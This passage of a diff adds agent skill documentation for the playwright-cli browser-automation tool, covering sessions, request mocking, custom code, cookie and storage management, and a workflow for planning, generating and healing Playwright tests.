+playwright-cli close-all
+# Forcefully kill all browser processes
+playwright-cli kill-all
+```
+
+## Installation
+
+If global `playwright-cli` command is not available, try a local version via `npx playwright cli`:
+
+```bash
+npx --no-install playwright --version
+```
+
+When local version is available, use `npx playwright cli` in all commands. Otherwise, install `playwright-cli` as a global command:
+
+```bash
+npm install -g @playwright/cli@latest
+```
+
+## Example: Form submission
+
+```bash
+playwright-cli open https://example.com/form
+playwright-cli snapshot
+
+playwright-cli fill e1 "user@example.com"
+playwright-cli fill e2 "password123"
+playwright-cli click e3
+playwright-cli snapshot
+playwright-cli close
+```
+
+## Example: Multi-tab workflow
+
+```bash
+playwright-cli open https://example.com
+playwright-cli tab-new https://example.com/other
+playwright-cli tab-list
+playwright-cli tab-select 0
+playwright-cli snapshot
+playwright-cli close
+```
+
+## Example: Debugging with DevTools
+
+```bash
+playwright-cli open https://example.com
+playwright-cli click e4
+playwright-cli fill e7 "test"
+playwright-cli console
+playwright-cli requests
+playwright-cli close
+```
+
+```bash
+playwright-cli open https://example.com
+playwright-cli tracing-start
+playwright-cli click e4
+playwright-cli fill e7 "test"
+playwright-cli tracing-stop
+playwright-cli close
+```
+
+## Example: Interactive session
+
+Ask the user for UI review or design feedback. The user draws boxes on the live page and types comments; you receive the annotated screenshot, the snapshot of the marked region, and the user's notes. Use this whenever the user asks for "UI review", "design feedback", or to "ask the user what they think / want / mean":
+
+```bash
+playwright-cli open https://example.com
+playwright-cli show --annotate
+```
+
+## Specific tasks
+
+* **Running and Debugging Playwright tests** [references/playwright-tests.md](references/playwright-tests.md)
+* **Request mocking** [references/request-mocking.md](references/request-mocking.md)
+* **Running Playwright code** [references/running-code.md](references/running-code.md)
+* **Browser session management** [references/session-management.md](references/session-management.md)
+* **Storage state (cookies, localStorage)** [references/storage-state.md](references/storage-state.md)
+* **Test generation (plan / generate / heal)** [references/test-generation.md](references/test-generation.md)
+* **Tracing** [references/tracing.md](references/tracing.md)
+* **Video recording** [references/video-recording.md](references/video-recording.md)
+* **Inspecting element attributes** [references/element-attributes.md](references/element-attributes.md)

--- a/.agents/skills/playwright-cli/references/element-attributes.md
+++ b/.agents/skills/playwright-cli/references/element-attributes.md
@@ -1,0 +1,23 @@
+# Inspecting Element Attributes
+
+When the snapshot doesn't show an element's `id`, `class`, `data-*` attributes, or other DOM properties, use `eval` to inspect them.
+
+## Examples
+
+```bash
+playwright-cli snapshot
+# snapshot shows a button as e7 but doesn't reveal its id or data attributes
+
+# get the element's id
+playwright-cli eval "el => el.id" e7
+
+# get all CSS classes
+playwright-cli eval "el => el.className" e7
+
+# get a specific attribute
+playwright-cli eval "el => el.getAttribute('data-testid')" e7
+playwright-cli eval "el => el.getAttribute('aria-label')" e7
+
+# get a computed style property
+playwright-cli eval "el => getComputedStyle(el).display" e7
+```

--- a/.agents/skills/playwright-cli/references/playwright-tests.md
+++ b/.agents/skills/playwright-cli/references/playwright-tests.md
@@ -1,0 +1,39 @@
+# Running Playwright Tests
+
+To run Playwright tests, use the `npx playwright test` command, or a package manager script. To avoid opening the interactive html report, use `PLAYWRIGHT_HTML_OPEN=never` environment variable.
+
+```bash
+# Run all tests
+PLAYWRIGHT_HTML_OPEN=never npx playwright test
+
+# Run all tests through a custom npm script
+PLAYWRIGHT_HTML_OPEN=never npm run special-test-command
+```
+
+# Debugging Playwright Tests
+
+To debug a failing Playwright test, run it with `--debug=cli` option. This command will pause the test at the start and print the debugging instructions.
+
+**IMPORTANT**: run the command in the background and check the output until "Debugging Instructions" is printed. Make sure to stop the command after you have finished.
+
+Once instructions containing a session name are printed, use `playwright-cli` to attach the session and explore the page.
+
+```bash
+# Run the test
+PLAYWRIGHT_HTML_OPEN=never npx playwright test --debug=cli
+# ...
+# ... debugging instructions for "tw-abcdef" session ...
+# ...
+
+# Attach to the test
+playwright-cli attach tw-abcdef
+```
+
+Keep the test running in the background while you explore and look for a fix.
+The test is paused at the start, so you should step over or pause at a particular location
+where the problem is most likely to be.
+
+Every action you perform with `playwright-cli` generates corresponding Playwright TypeScript code.
+This code appears in the output and can be copied directly into the test. Most of the time, a specific locator or an expectation should be updated, but it could also be a bug in the app. Use your judgement.
+
+After fixing the test, stop the background test run. Rerun to check that test passes.

--- a/.agents/skills/playwright-cli/references/request-mocking.md
+++ b/.agents/skills/playwright-cli/references/request-mocking.md
@@ -1,0 +1,87 @@
+# Request Mocking
+
+Intercept, mock, modify, and block network requests.
+
+## CLI Route Commands
+
+```bash
+# Mock with custom status
+playwright-cli route "**/*.jpg" --status=404
+
+# Mock with JSON body
+playwright-cli route "**/api/users" --body='[{"id":1,"name":"Alice"}]' --content-type=application/json
+
+# Mock with custom headers
+playwright-cli route "**/api/data" --body='{"ok":true}' --header="X-Custom: value"
+
+# Remove headers from requests
+playwright-cli route "**/*" --remove-header=cookie,authorization
+
+# List active routes
+playwright-cli route-list
+
+# Remove a route or all routes
+playwright-cli unroute "**/*.jpg"
+playwright-cli unroute
+```
+
+## URL Patterns
+
+```
+**/api/users           - Exact path match
+**/api/*/details       - Wildcard in path
+**/*.{png,jpg,jpeg}    - Match file extensions
+**/search?q=*          - Match query parameters
+```
+
+## Advanced Mocking with run-code
+
+For conditional responses, request body inspection, response modification, or delays:
+
+### Conditional Response Based on Request
+
+```bash
+playwright-cli run-code "async page => {
+  await page.route('**/api/login', route => {
+    const body = route.request().postDataJSON();
+    if (body.username === 'admin') {
+      route.fulfill({ body: JSON.stringify({ token: 'mock-token' }) });
+    } else {
+      route.fulfill({ status: 401, body: JSON.stringify({ error: 'Invalid' }) });
+    }
+  });
+}"
+```
+
+### Modify Real Response
+
+```bash
+playwright-cli run-code "async page => {
+  await page.route('**/api/user', async route => {
+    const response = await route.fetch();
+    const json = await response.json();
+    json.isPremium = true;
+    await route.fulfill({ response, json });
+  });
+}"
+```
+
+### Simulate Network Failures
+
+```bash
+playwright-cli run-code "async page => {
+  await page.route('**/api/offline', route => route.abort('internetdisconnected'));
+}"
+# Options: connectionrefused, timedout, connectionreset, internetdisconnected
+```
+
+### Delayed Response
+
+```bash
+playwright-cli run-code "async page => {
+  await page.route('**/api/slow', async route => {
+    await new Promise(r => setTimeout(r, 3000));
+    route.fulfill({ body: JSON.stringify({ data: 'loaded' }) });
+  });
+}"
+```

--- a/.agents/skills/playwright-cli/references/running-code.md
+++ b/.agents/skills/playwright-cli/references/running-code.md
@@ -1,0 +1,241 @@
+# Running Custom Playwright Code
+
+Use `run-code` to execute arbitrary Playwright code for advanced scenarios not covered by CLI commands.
+
+## Syntax
+
+```bash
+playwright-cli run-code "async page => {
+  // Your Playwright code here
+  // Access page.context() for browser context operations
+}"
+```
+
+You can also load the function from a file:
+
+```bash
+playwright-cli run-code --filename=./my-script.js
+```
+
+
+The code must be a single function expression, it is wrapped in `(...)` and evaluated.
+import/export/require syntax is not supported.
+
+## Geolocation
+
+```bash
+# Grant geolocation permission and set location
+playwright-cli run-code "async page => {
+  await page.context().grantPermissions(['geolocation']);
+  await page.context().setGeolocation({ latitude: 37.7749, longitude: -122.4194 });
+}"
+
+# Set location to London
+playwright-cli run-code "async page => {
+  await page.context().grantPermissions(['geolocation']);
+  await page.context().setGeolocation({ latitude: 51.5074, longitude: -0.1278 });
+}"
+
+# Clear geolocation override
+playwright-cli run-code "async page => {
+  await page.context().clearPermissions();
+}"
+```
+
+## Permissions
+
+```bash
+# Grant multiple permissions
+playwright-cli run-code "async page => {
+  await page.context().grantPermissions([
+    'geolocation',
+    'notifications',
+    'camera',
+    'microphone'
+  ]);
+}"
+
+# Grant permissions for specific origin
+playwright-cli run-code "async page => {
+  await page.context().grantPermissions(['clipboard-read'], {
+    origin: 'https://example.com'
+  });
+}"
+```
+
+## Media Emulation
+
+```bash
+# Emulate dark color scheme
+playwright-cli run-code "async page => {
+  await page.emulateMedia({ colorScheme: 'dark' });
+}"
+
+# Emulate light color scheme
+playwright-cli run-code "async page => {
+  await page.emulateMedia({ colorScheme: 'light' });
+}"
+
+# Emulate reduced motion
+playwright-cli run-code "async page => {
+  await page.emulateMedia({ reducedMotion: 'reduce' });
+}"
+
+# Emulate print media
+playwright-cli run-code "async page => {
+  await page.emulateMedia({ media: 'print' });
+}"
+```
+
+## Wait Strategies
+
+```bash
+# Wait for network idle
+playwright-cli run-code "async page => {
+  await page.waitForLoadState('networkidle');
+}"
+
+# Wait for specific element
+playwright-cli run-code "async page => {
+  await page.locator('.loading').waitFor({ state: 'hidden' });
+}"
+
+# Wait for function to return true
+playwright-cli run-code "async page => {
+  await page.waitForFunction(() => window.appReady === true);
+}"
+
+# Wait with timeout
+playwright-cli run-code "async page => {
+  await page.locator('.result').waitFor({ timeout: 10000 });
+}"
+```
+
+## Frames and Iframes
+
+```bash
+# Work with iframe
+playwright-cli run-code "async page => {
+  const frame = page.locator('iframe#my-iframe').contentFrame();
+  await frame.locator('button').click();
+}"
+
+# Get all frames
+playwright-cli run-code "async page => {
+  const frames = page.frames();
+  return frames.map(f => f.url());
+}"
+```
+
+## File Downloads
+
+```bash
+# Handle file download
+playwright-cli run-code "async page => {
+  const downloadPromise = page.waitForEvent('download');
+  await page.getByRole('link', { name: 'Download' }).click();
+  const download = await downloadPromise;
+  await download.saveAs('./downloaded-file.pdf');
+  return download.suggestedFilename();
+}"
+```
+
+## Clipboard
+
+```bash
+# Read clipboard (requires permission)
+playwright-cli run-code "async page => {
+  await page.context().grantPermissions(['clipboard-read']);
+  return await page.evaluate(() => navigator.clipboard.readText());
+}"
+
+# Write to clipboard
+playwright-cli run-code "async page => {
+  await page.evaluate(text => navigator.clipboard.writeText(text), 'Hello clipboard!');
+}"
+```
+
+## Page Information
+
+```bash
+# Get page title
+playwright-cli run-code "async page => {
+  return await page.title();
+}"
+
+# Get current URL
+playwright-cli run-code "async page => {
+  return page.url();
+}"
+
+# Get page content
+playwright-cli run-code "async page => {
+  return await page.content();
+}"
+
+# Get viewport size
+playwright-cli run-code "async page => {
+  return page.viewportSize();
+}"
+```
+
+## JavaScript Execution
+
+```bash
+# Execute JavaScript and return result
+playwright-cli run-code "async page => {
+  return await page.evaluate(() => {
+    return {
+      userAgent: navigator.userAgent,
+      language: navigator.language,
+      cookiesEnabled: navigator.cookieEnabled
+    };
+  });
+}"
+
+# Pass arguments to evaluate
+playwright-cli run-code "async page => {
+  const multiplier = 5;
+  return await page.evaluate(m => document.querySelectorAll('li').length * m, multiplier);
+}"
+```
+
+## Error Handling
+
+```bash
+# Try-catch in run-code
+playwright-cli run-code "async page => {
+  try {
+    await page.getByRole('button', { name: 'Submit' }).click({ timeout: 1000 });
+    return 'clicked';
+  } catch (e) {
+    return 'element not found';
+  }
+}"
+```
+
+## Complex Workflows
+
+```bash
+# Login and save state
+playwright-cli run-code "async page => {
+  await page.goto('https://example.com/login');
+  await page.getByRole('textbox', { name: 'Email' }).fill('user@example.com');
+  await page.getByRole('textbox', { name: 'Password' }).fill('secret');
+  await page.getByRole('button', { name: 'Sign in' }).click();
+  await page.waitForURL('**/dashboard');
+  await page.context().storageState({ path: 'auth.json' });
+  return 'Login successful';
+}"
+
+# Scrape data from multiple pages
+playwright-cli run-code "async page => {
+  const results = [];
+  for (let i = 1; i <= 3; i++) {
+    await page.goto(\`https://example.com/page/\${i}\`);
+    const items = await page.locator('.item').allTextContents();
+    results.push(...items);
+  }
+  return results;
+}"
+```

--- a/.agents/skills/playwright-cli/references/session-management.md
+++ b/.agents/skills/playwright-cli/references/session-management.md
@@ -1,0 +1,225 @@
+# Browser Session Management
+
+Run multiple isolated browser sessions concurrently with state persistence.
+
+## Named Browser Sessions
+
+Use `-s` flag to isolate browser contexts:
+
+```bash
+# Browser 1: Authentication flow
+playwright-cli -s=auth open https://app.example.com/login
+
+# Browser 2: Public browsing (separate cookies, storage)
+playwright-cli -s=public open https://example.com
+
+# Commands are isolated by browser session
+playwright-cli -s=auth fill e1 "user@example.com"
+playwright-cli -s=public snapshot
+```
+
+## Browser Session Isolation Properties
+
+Each browser session has independent:
+- Cookies
+- LocalStorage / SessionStorage
+- IndexedDB
+- Cache
+- Browsing history
+- Open tabs
+
+## Browser Session Commands
+
+```bash
+# List all browser sessions
+playwright-cli list
+
+# Stop a browser session (close the browser)
+playwright-cli close                # stop the default browser
+playwright-cli -s=mysession close   # stop a named browser
+
+# Stop all browser sessions
+playwright-cli close-all
+
+# Forcefully kill all daemon processes (for stale/zombie processes)
+playwright-cli kill-all
+
+# Delete browser session user data (profile directory)
+playwright-cli delete-data                # delete default browser data
+playwright-cli -s=mysession delete-data   # delete named browser data
+```
+
+## Environment Variable
+
+Set a default browser session name via environment variable:
+
+```bash
+export PLAYWRIGHT_CLI_SESSION="mysession"
+playwright-cli open example.com  # Uses "mysession" automatically
+```
+
+## Common Patterns
+
+### Concurrent Scraping
+
+```bash
+#!/bin/bash
+# Scrape multiple sites concurrently
+
+# Start all browsers
+playwright-cli -s=site1 open https://site1.com &
+playwright-cli -s=site2 open https://site2.com &
+playwright-cli -s=site3 open https://site3.com &
+wait
+
+# Take snapshots from each
+playwright-cli -s=site1 snapshot
+playwright-cli -s=site2 snapshot
+playwright-cli -s=site3 snapshot
+
+# Cleanup
+playwright-cli close-all
+```
+
+### A/B Testing Sessions
+
+```bash
+# Test different user experiences
+playwright-cli -s=variant-a open "https://app.com?variant=a"
+playwright-cli -s=variant-b open "https://app.com?variant=b"
+
+# Compare
+playwright-cli -s=variant-a screenshot
+playwright-cli -s=variant-b screenshot
+```
+
+### Persistent Profile
+
+By default, browser profile is kept in memory only. Use `--persistent` flag on `open` to persist the browser profile to disk:
+
+```bash
+# Use persistent profile (auto-generated location)
+playwright-cli open https://example.com --persistent
+
+# Use persistent profile with custom directory
+playwright-cli open https://example.com --profile=/path/to/profile
+```
+
+## Attaching to a Running Browser
+
+Use `attach` to connect to a browser that is already running, instead of launching a new one.
+
+### Attach by channel name
+
+Connect to a running Chrome or Edge instance by its channel name. The browser must have remote debugging enabled — navigate to `chrome://inspect/#remote-debugging` in the target browser and check "Allow remote debugging for this browser instance".
+
+```bash
+# Attach to Chrome
+playwright-cli attach --cdp=chrome
+
+# Attach to Chrome Canary
+playwright-cli attach --cdp=chrome-canary
+
+# Attach to Microsoft Edge
+playwright-cli attach --cdp=msedge
+
+# Attach to Edge Dev
+playwright-cli attach --cdp=msedge-dev
+```
+
+Supported channels: `chrome`, `chrome-beta`, `chrome-dev`, `chrome-canary`, `msedge`, `msedge-beta`, `msedge-dev`, `msedge-canary`.
+
+When `--session` is not provided, the session is named after the channel (e.g. `--cdp=msedge` creates a session called `msedge`), so parallel attaches to Chrome and Edge don't collide on `default`. Pass `--session=<name>` to override.
+
+### Attach via CDP endpoint
+
+Connect to a browser that exposes a Chrome DevTools Protocol endpoint:
+
+```bash
+playwright-cli attach --cdp=http://localhost:9222
+```
+
+### Attach via browser extension
+
+Connect to a browser with the Playwright extension installed:
+
+```bash
+playwright-cli attach --extension
+```
+
+### Detach
+
+Tear down an attached session without affecting the external browser:
+
+```bash
+# Detach the default attached session
+playwright-cli detach
+
+# Detach a specific attached session
+playwright-cli -s=msedge detach
+```
+
+`detach` only works on sessions created via `attach`. For sessions created via `open`, use `close`.
+
+## Default Browser Session
+
+When `-s` is omitted, commands use the default browser session:
+
+```bash
+# These use the same default browser session
+playwright-cli open https://example.com
+playwright-cli snapshot
+playwright-cli close  # Stops default browser
+```
+
+## Browser Session Configuration
+
+Configure a browser session with specific settings when opening:
+
+```bash
+# Open with config file
+playwright-cli open https://example.com --config=.playwright/my-cli.json
+
+# Open with specific browser
+playwright-cli open https://example.com --browser=firefox
+
+# Open in headed mode
+playwright-cli open https://example.com --headed
+
+# Open with persistent profile
+playwright-cli open https://example.com --persistent
+```
+
+## Best Practices
+
+### 1. Name Browser Sessions Semantically
+
+```bash
+# GOOD: Clear purpose
+playwright-cli -s=github-auth open https://github.com
+playwright-cli -s=docs-scrape open https://docs.example.com
+
+# AVOID: Generic names
+playwright-cli -s=s1 open https://github.com
+```
+
+### 2. Always Clean Up
+
+```bash
+# Stop browsers when done
+playwright-cli -s=auth close
+playwright-cli -s=scrape close
+
+# Or stop all at once
+playwright-cli close-all
+
+# If browsers become unresponsive or zombie processes remain
+playwright-cli kill-all
+```
+
+### 3. Delete Stale Browser Data
+
+```bash
+# Remove old browser data to free disk space
+playwright-cli -s=oldsession delete-data
+```

--- a/.agents/skills/playwright-cli/references/storage-state.md
+++ b/.agents/skills/playwright-cli/references/storage-state.md
@@ -1,0 +1,275 @@
+# Storage Management
+
+Manage cookies, localStorage, sessionStorage, and browser storage state.
+
+## Storage State
+
+Save and restore complete browser state including cookies and storage.
+
+### Save Storage State
+
+```bash
+# Save to auto-generated filename (storage-state-{timestamp}.json)
+playwright-cli state-save
+
+# Save to specific filename
+playwright-cli state-save my-auth-state.json
+```
+
+### Restore Storage State
+
+```bash
+# Load storage state from file
+playwright-cli state-load my-auth-state.json
+
+# Reload page to apply cookies
+playwright-cli open https://example.com
+```
+
+### Storage State File Format
+
+The saved file contains:
+
+```json
+{
+  "cookies": [
+    {
+      "name": "session_id",
+      "value": "abc123",
+      "domain": "example.com",
+      "path": "/",
+      "expires": 1893456000,
+      "httpOnly": true,
+      "secure": true,
+      "sameSite": "Lax"
+    }
+  ],
+  "origins": [
+    {
+      "origin": "https://example.com",
+      "localStorage": [
+        { "name": "theme", "value": "dark" },
+        { "name": "user_id", "value": "12345" }
+      ]
+    }
+  ]
+}
+```
+
+## Cookies
+
+### List All Cookies
+
+```bash
+playwright-cli cookie-list
+```
+
+### Filter Cookies by Domain
+
+```bash
+playwright-cli cookie-list --domain=example.com
+```
+
+### Filter Cookies by Path
+
+```bash
+playwright-cli cookie-list --path=/api
+```
+
+### Get Specific Cookie
+
+```bash
+playwright-cli cookie-get session_id
+```
+
+### Set a Cookie
+
+```bash
+# Basic cookie
+playwright-cli cookie-set session abc123
+
+# Cookie with options
+playwright-cli cookie-set session abc123 --domain=example.com --path=/ --httpOnly --secure --sameSite=Lax
+
+# Cookie with expiration (Unix timestamp)
+playwright-cli cookie-set remember_me token123 --expires=1893456000
+```
+
+### Delete a Cookie
+
+```bash
+playwright-cli cookie-delete session_id
+```
+
+### Clear All Cookies
+
+```bash
+playwright-cli cookie-clear
+```
+
+### Advanced: Multiple Cookies or Custom Options
+
+For complex scenarios like adding multiple cookies at once, use `run-code`:
+
+```bash
+playwright-cli run-code "async page => {
+  await page.context().addCookies([
+    { name: 'session_id', value: 'sess_abc123', domain: 'example.com', path: '/', httpOnly: true },
+    { name: 'preferences', value: JSON.stringify({ theme: 'dark' }), domain: 'example.com', path: '/' }
+  ]);
+}"
+```
+
+## Local Storage
+
+### List All localStorage Items
+
+```bash
+playwright-cli localstorage-list
+```
+
+### Get Single Value
+
+```bash
+playwright-cli localstorage-get token
+```
+
+### Set Value
+
+```bash
+playwright-cli localstorage-set theme dark
+```
+
+### Set JSON Value
+
+```bash
+playwright-cli localstorage-set user_settings '{"theme":"dark","language":"en"}'
+```
+
+### Delete Single Item
+
+```bash
+playwright-cli localstorage-delete token
+```
+
+### Clear All localStorage
+
+```bash
+playwright-cli localstorage-clear
+```
+
+### Advanced: Multiple Operations
+
+For complex scenarios like setting multiple values at once, use `run-code`:
+
+```bash
+playwright-cli run-code "async page => {
+  await page.evaluate(() => {
+    localStorage.setItem('token', 'jwt_abc123');
+    localStorage.setItem('user_id', '12345');
+    localStorage.setItem('expires_at', Date.now() + 3600000);
+  });
+}"
+```
+
+## Session Storage
+
+### List All sessionStorage Items
+
+```bash
+playwright-cli sessionstorage-list
+```
+
+### Get Single Value
+
+```bash
+playwright-cli sessionstorage-get form_data
+```
+
+### Set Value
+
+```bash
+playwright-cli sessionstorage-set step 3
+```
+
+### Delete Single Item
+
+```bash
+playwright-cli sessionstorage-delete step
+```
+
+### Clear sessionStorage
+
+```bash
+playwright-cli sessionstorage-clear
+```
+
+## IndexedDB
+
+### List Databases
+
+```bash
+playwright-cli run-code "async page => {
+  return await page.evaluate(async () => {
+    const databases = await indexedDB.databases();
+    return databases;
+  });
+}"
+```
+
+### Delete Database
+
+```bash
+playwright-cli run-code "async page => {
+  await page.evaluate(() => {
+    indexedDB.deleteDatabase('myDatabase');
+  });
+}"
+```
+
+## Common Patterns
+
+### Authentication State Reuse
+
+```bash
+# Step 1: Login and save state
+playwright-cli open https://app.example.com/login
+playwright-cli snapshot
+playwright-cli fill e1 "user@example.com"
+playwright-cli fill e2 "password123"
+playwright-cli click e3
+
+# Save the authenticated state
+playwright-cli state-save auth.json
+
+# Step 2: Later, restore state and skip login
+playwright-cli state-load auth.json
+playwright-cli open https://app.example.com/dashboard
+# Already logged in!
+```
+
+### Save and Restore Roundtrip
+
+```bash
+# Set up authentication state
+playwright-cli open https://example.com
+playwright-cli eval "() => { document.cookie = 'session=abc123'; localStorage.setItem('user', 'john'); }"
+
+# Save state to file
+playwright-cli state-save my-session.json
+
+# ... later, in a new session ...
+
+# Restore state
+playwright-cli state-load my-session.json
+playwright-cli open https://example.com
+# Cookies and localStorage are restored!
+```
+
+## Security Notes
+
+- Never commit storage state files containing auth tokens
+- Add `*.auth-state.json` to `.gitignore`
+- Delete state files after automation completes
+- Use environment variables for sensitive data
+- By default, sessions run in-memory mode which is safer for sensitive operations

--- a/.agents/skills/playwright-cli/references/test-generation.md
+++ b/.agents/skills/playwright-cli/references/test-generation.md
@@ -1,0 +1,433 @@
+# Test generation (plan → generate → heal)
+
+End-to-end workflow for authoring and maintaining Playwright tests with `playwright-cli`. Every `playwright-cli` action emits the equivalent Playwright TypeScript, and that generated code is the raw material for every test. The sections below can be used independently:
+
+- **How generation works** — the core mechanic everything else relies on: actions become TypeScript, plus how to add assertions.
+- **Plan** — explore the app, produce a spec file describing what to test.
+- **Generate** — turn a spec into Playwright test files. Update the spec if it's vague or stale.
+- **Heal** — diagnose failing tests, fix the code, reconcile the spec with reality.
+
+Plan / generate / heal lean on the same mechanic: run `npx playwright test --debug=cli` in the background, then `playwright-cli attach tw-XXXX` to drive the paused page interactively. See [playwright-tests.md](playwright-tests.md) for the debug/attach mechanics.
+
+---
+
+## 0. How generation works
+
+Every action you perform with `playwright-cli` generates corresponding Playwright TypeScript code. This code appears in the output and can be copied directly into your test files.
+
+```bash
+# Start a session
+playwright-cli open https://example.com/login
+
+# Take a snapshot to see elements
+playwright-cli snapshot
+# Output shows: e1 [textbox "Email"], e2 [textbox "Password"], e3 [button "Sign In"]
+
+# Fill form fields - generates code automatically
+playwright-cli fill e1 "user@example.com"
+# Ran Playwright code:
+# await page.getByRole('textbox', { name: 'Email' }).fill('user@example.com');
+
+playwright-cli fill e2 "password123"
+# Ran Playwright code:
+# await page.getByRole('textbox', { name: 'Password' }).fill('password123');
+
+playwright-cli click e3
+# Ran Playwright code:
+# await page.getByRole('button', { name: 'Sign In' }).click();
+```
+
+### Building a test file
+
+Collect the generated code into a Playwright test:
+
+```typescript
+import { test, expect } from '@playwright/test';
+
+test('login flow', async ({ page }) => {
+  // Generated code from playwright-cli session:
+  await page.goto('https://example.com/login');
+  await page.getByRole('textbox', { name: 'Email' }).fill('user@example.com');
+  await page.getByRole('textbox', { name: 'Password' }).fill('password123');
+  await page.getByRole('button', { name: 'Sign In' }).click();
+
+  // Add assertions
+  await expect(page).toHaveURL(/.*dashboard/);
+});
+```
+
+### Use semantic locators
+
+The generated code uses role-based locators when possible, which are more resilient:
+
+```typescript
+// Generated (good - semantic)
+await page.getByRole('button', { name: 'Submit' }).click();
+
+// Avoid (fragile - CSS selectors)
+await page.locator('#submit-btn').click();
+```
+
+### Explore before recording
+
+Take snapshots to understand the page structure before recording actions:
+
+```bash
+playwright-cli open https://example.com
+playwright-cli snapshot
+# Review the element structure
+playwright-cli click e5
+```
+
+### Add assertions manually
+
+Generated code captures actions but not assertions. Add expectations in your test using one of the recommended matchers:
+
+- `toBeVisible()` — element is rendered and visible
+- `toHaveText(text)` — element text content matches
+- `toHaveValue(value) / toBeEmpty()` — input/select value matches
+- `toBeChecked() / toBeUnchecked()` — checkbox state matches
+- `toMatchAriaSnapshot(snapshot)` — page (or locator) matches a partial accessibility snapshot
+
+Use `playwright-cli generate-locator <target>` to produce the locator expression for the assertion, and the snapshot/eval commands to capture the expected value.
+
+When asserting text content, make sure that generated locator does not contain text from the element itself. `getByTestId()` or `getByLabel()` usually work well with asserting text. When locator is text-based, prefer `toBeVisible()` instead.
+
+Snapshot to be matched does not have to contain all the information - only capture what's necessary for the assertion. You can use regular expressions for unstable values.
+
+```bash
+# Get a stable locator for an element ref to use in the assertion
+playwright-cli --raw generate-locator e5
+# getByRole('button', { name: 'Submit' })
+
+# Capture expected text content for toHaveText
+playwright-cli --raw eval "el => el.textContent" e5
+
+# Capture expected input value for toHaveValue/toBeEmpty
+playwright-cli --raw eval "el => el.value" e5
+
+# Capture expected aria snapshot for toMatchAriaSnapshot/toBeChecked
+# (whole page, or use a ref to scope to a region)
+playwright-cli --raw snapshot
+playwright-cli --raw snapshot e5
+```
+
+```typescript
+// Generated action
+await page.getByRole('button', { name: 'Submit' }).click();
+
+// Manual assertions using the outputs above:
+await expect(page.getByRole('alert', { name: 'Success' })).toBeVisible();
+await expect(page.getByTestId('main-header')).toHaveText('Welcome, user');
+await expect(page.getByRole('textbox', { name: 'Email' })).toHaveValue('user@example.com');
+await expect(page.getByRole('checkbox', { name: 'Enable notifications' })).toBeChecked();
+
+// toMatchAriaSnapshot on the whole page, finds a matching region
+await expect(page).toMatchAriaSnapshot(`
+  - heading "Welcome, user"
+  - link /\\d+ new messages?/
+  - button "Sign out"
+`);
+
+// toMatchAriaSnapshot scoped to a region
+await expect(page.getByRole('navigation')).toMatchAriaSnapshot(`
+  - link "Home"
+  - link /\\d+ new messages?/
+  - link "Profile"
+`);
+```
+
+---
+
+## 1. Planning
+
+Goal: produce a spec file (e.g. `specs/<feature>.plan.md`) that enumerates the scenarios to test. **Always** write the spec to a file.
+
+### 1.1 Prerequisite: workspace
+
+Check the workspace has Playwright installed before anything else:
+
+```bash
+# Either of these confirms a workspace:
+test -f playwright.config.ts || test -f playwright.config.js
+npx --no-install playwright --version
+```
+
+If there is no Playwright install, bootstrap one and let the user pick the defaults:
+
+```bash
+npm init playwright@latest
+```
+
+### 1.2 Prerequisite: seed test
+
+A **seed test** is a minimal test that lands the page in the state every scenario starts from: navigation to the app, any required login, feature flags, etc. Scenarios assume a fresh start *after* the seed. `--debug=cli` pauses *inside* this test, so the seed is where every planning and generation session begins.
+
+Minimum viable seed:
+
+```ts
+// tests/seed.spec.ts
+import { test } from '@playwright/test';
+
+test('seed', async ({ page }) => {
+  await page.goto('https://example.com/');
+});
+```
+
+Preferred — push navigation into a fixture so scenario tests reuse it:
+
+```ts
+// tests/fixtures.ts
+import { test as baseTest } from '@playwright/test';
+export { expect } from '@playwright/test';
+
+export const test = baseTest.extend({
+  page: async ({ page }, use) => {
+    await page.goto('https://example.com/');
+    await use(page);
+  },
+});
+```
+
+```ts
+// tests/seed.spec.ts
+import { test } from './fixtures';
+
+test('seed', async ({ page }) => {
+  // Fixture already navigates. This empty body tells agents where to start.
+});
+```
+
+If no seed exists, create one that at least navigates to the app.
+
+### 1.3 Explore the app
+
+Launch the app via the seed in the background and attach:
+
+```bash
+PLAYWRIGHT_HTML_OPEN=never npx playwright test tests/seed.spec.ts --debug=cli
+# wait for "Debugging Instructions" and the session name tw-XXXX
+playwright-cli attach tw-XXXX
+```
+
+Resume so the seed runs, then probe the app:
+
+```bash
+playwright-cli resume                   # resume so that seed test runs fully
+playwright-cli snapshot                 # inventory of interactive elements
+playwright-cli click e5                 # follow a flow
+playwright-cli eval "location.href"     # read URL / state
+playwright-cli show --annotate          # ask the user to point at something
+```
+
+Map out:
+
+- Interactive surfaces (forms, buttons, lists, filters, modals).
+- Primary user journeys end-to-end.
+- Edge cases: empty states, validation errors, very long input, boundary values.
+- Persistence: reload, local/session storage, URL fragments.
+- Navigation: which controls change the URL, back/forward behaviour.
+
+**Important**: Do not just open the app url with playwright-cli, always go through the test to capture any custom setup done there.
+**Important**: Stop the background test when done exploring.
+
+### 1.4 Write the spec file
+
+Save under `specs/<feature>.plan.md`. Use this structure:
+
+```markdown
+# <Feature> Test Plan
+
+## Application Overview
+
+<One paragraph describing what the feature does and why it matters.>
+
+## Test Scenarios
+
+### 1. <Group Name>
+
+**Seed:** `tests/seed.spec.ts`
+
+#### 1.1. <kebab-case-scenario-name>
+
+**File:** `tests/<group>/<kebab-case-scenario-name>.spec.ts`
+
+**Steps:**
+  1. <Concrete user step>
+    - expect: <observable outcome>
+    - expect: <another observable outcome>
+  2. <Next step>
+    - expect: <outcome>
+
+#### 1.2. <next-scenario>
+...
+
+### 2. <Next Group>
+
+**Seed:** `tests/seed.spec.ts`
+...
+```
+
+Guidelines:
+
+- Each scenario is independent and starts from the seed's fresh state — never chain scenarios.
+- Scenario names are kebab-case and match the test file name (`should-add-single-todo` → `should-add-single-todo.spec.ts`).
+- Cover happy path, edge cases, validation, negative flows, persistence.
+- Write steps at the user level ("Type 'Buy milk' into the input"), not the API level ("call `fill`").
+- Put observable outcomes in `- expect:` bullets; each becomes an assertion during generation.
+
+---
+
+## 2. Generate
+
+Goal: take a spec file and produce Playwright test files. Optionally update the spec if it has drifted.
+
+### 2.1 Inputs
+
+- **Spec file**, e.g. `specs/basic-operations.plan.md`.
+- **Target**: either a single scenario (e.g. `1.2`), a whole group (`1`), or all.
+- **Seed file**, read from the `**Seed:**` line of the scenario's group.
+
+### 2.2 Generate one scenario
+
+For each target scenario, in sequence (never in parallel — scenarios share the seed session):
+
+```bash
+PLAYWRIGHT_HTML_OPEN=never npx playwright test <seed-file> --debug=cli   # background
+playwright-cli attach tw-XXXX
+# resume
+```
+
